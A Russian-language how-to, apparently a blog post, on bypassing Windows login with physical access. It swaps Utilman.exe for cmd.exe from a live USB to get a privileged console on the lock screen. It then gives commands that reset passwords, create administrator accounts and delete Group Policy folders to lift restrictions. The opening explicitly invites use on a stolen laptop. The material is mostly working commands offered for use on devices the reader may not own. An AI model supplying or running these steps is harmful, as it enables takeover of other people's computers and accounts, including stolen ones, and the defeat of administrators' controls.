Взлом Windows из-под Windows

Приветствую %username%, это обновленная версия взлома WIndows. (Гик эдишон)

Вы забыли пароль? Нашли ноутбук? Украли ноутбук? Не имеет значения.

Суть

Вы не знаете пароль от пользователя или пользователей системы в т.ч. от админа. И ваши права ограничены, а перезаписать диск не вариант. В таком случае вам нужно получить доступ к консоли запущенной с админ правами или правами системы что = админ правами. Для этого вам понадобиться любая лайв система, но крайне желательно на базе Windows.

Например: 2k10 Live или что еще проще, флешка с записанным образом Windows (любой версии) на нее. Так как вариант с образом Windows (загрузочная флешка) проще для не опытных пользователей, разберем его.

Подготовка

Вам понадобиться флешка размером больше образа Windows, который вы собираетесь использовать.

Далее нужно сделать загрузочную флешку, в формате GPT или MBR, если очень кратно MBR = старые ПК, GPT = наоборот.

Если устройство старое выбирайте MBR, если новое GPT. Если вы не знаете в какой момент жизни вам понадобится флешка, или просто не уверены – выбираете MBR. Большинство новых материнских плат могут читать как UEFI так и legacy. В некоторых случаях в биосе нужно включить поддержку легаси.

Подробнее о том как создать загрузочную флешку можете почитать здесь.

Действие

Подключаем флешку, перезагружаемся в биос, ставим флешку в начало загрузочного списка (boot), сохраняем, выходим и уже загружаемся с флешки. Вас встретит установочный экран Windows, на этом этапе нажимает Shift+F10 и открывается консоль. Здесь необходимо узнать букву диска где установлена система, так как она может отличаться от буквы в проводнике.

Для этого прописываем две команды:

diskpart # Утилита DIKSPART
lis vol  # Список дисков

Вы увидите несколько столбцов, Volume, Ltr и др. Нужно посмотреть букву в столбце – Ltr.

Далее вводим следующие команды (где X – ваша буква диска):

copy X:\Windows\system32\Utilman.exe X:\Windows\system32\Utilman.exe.bak # Бэкап заменяемого файла
copy X:\Windows\system32\cmd.exe X:\Windows\system32\Utilman.exe         # Заменяем на терминал

Что мы сделали?

На экране блокировки Windows есть значок спец. возможностей, за запуск которого отвечает Utilman.exe, мы заменили его на cmd.exe. Тем самым сделали так что бы при запуске спец. возможностей запускалась командная строка. (Да, это просто работает) И запускаться она будет с правами администратора.

Как вернуть все обратно?
Делать все нужно строго через лайв систему, а не через ОС. То есть вы заменили файлы через любую лайв систему, то и возвращать бэкап НУЖНО аналогичным способом!

Загружаемся в лайв систему, и прописываем следующие команды:

copy X:\Windows\system32\Utilman.exe.bak X:\Windows\system32\Utilman.exe # Заменить измененный .exe на ориг.
del X:\Windows\system32\Utilman.exe.bak                                  # Удаление бэкапа

Админ \ Вход

И так вы проделали все что написано выше, и теперь у вас открывается консоль на экране блокировки, если же не открывается вы сделали что то не так, здесь только две вещи можно сделать не так: 1) Заменить файл не на том диске. 2) Заменить не тот файл, или сделать это неправильно (не заменить).

net user                                     # Показать список пользователей
net localgroup Администраторы username /add  # Добавить пользователя в группу
net localgroup Пользователи username /delete # Удалить пользователя из группы

Что бы дать права администратора пользователю, его необходимо добавить в группу Администраторы.

Открой меня

Система может быть не на русском, и даже не на английском языке, в таком случае нужно писать имена групп, на том языке на каком система.

Например:

RU: Администраторы \ Пользователи

EN: Administrators \ Users


Если имя пользователя содержит пробелы, то его необходимо взять в кавычки – ""


Так же очень важно понимать, что если учетная запись НЕ локальная, а сетевая ака Microsoft, то сменить пароль админа не получится.

В таком случае верным решением будет использовать второго пользователя, что бы получить доступ. Сменить пароль и дать права (если их нет) на второго пользователя, если он конечно же есть.

Либо же просто создать нового пользователя с правами администратора.

Изменим пароль существующего пользователя
net user username *

Где username – имя пользователя.

После ввода команды, попросит ввести пароль, потом повторить веденный пароль, или можно просто нажать два раза enter, что бы было без пароля.

Так же можно изменить пароль таким способом:

net user username password

Где username – имя пользователя, где password – новый пароль.

Создадим нового пользователя
net user username1 pass1 /add # Создаст пользователя - username1, с паролем - pass1
Как удалить пользователя
net user username /delete

Групповая политика

Что это такое?

И так, что это такое? Это жесткое ограничение пользователя. Их может быть очень много, от скрытия и закрытия доступа к дискам, до выключения возможности использовать контекстное меню проводника. Соответственно с помощью групповой политики (gpedit.msc) можно разрешить запускать только определенные программы, или наоборот запретить запускать. Запретить подключение внешних накопителей, персонализацию, установку программ, выполнение команды RUN, удаление вкладок и функций разного встроенного в Windows ПО и многое другое.

И в некоторых случаях прав администратора будет не достаточно что бы отключить все ограничения. Но это уже исключения, связанные с неправильной настройкой.

Существует возможность быстро вернуть все настройки по умолчанию, с помощью терминала. Как от имени администратора так и из-под Windows.

Если на ПК, по какой то причине нет возможности дать права администратора, или вы просто не хотите этого делать. Можно все сделать с помощью трюка описанного выше или прямо из лайв системы.

Реализовать это можно следующими командами:

rd /S /Q X:\Windows\System32\GroupPolicy
rd /S /Q X:\Windows\System32\GroupPolicyUsers
rd – это удалить.

/S – удаляет так же все файлы в указанном каталоге.

/Q – тихий режим.


И на этом пожалуй все, возможно эта статья будет дополняться, а может и нет…

Этот веб-сайт использует файлы cookie, чтобы обеспечить вам наилучший опыт.
Этот веб-сайт использует файлы cookie, чтобы обеспечить вам наилучший опыт.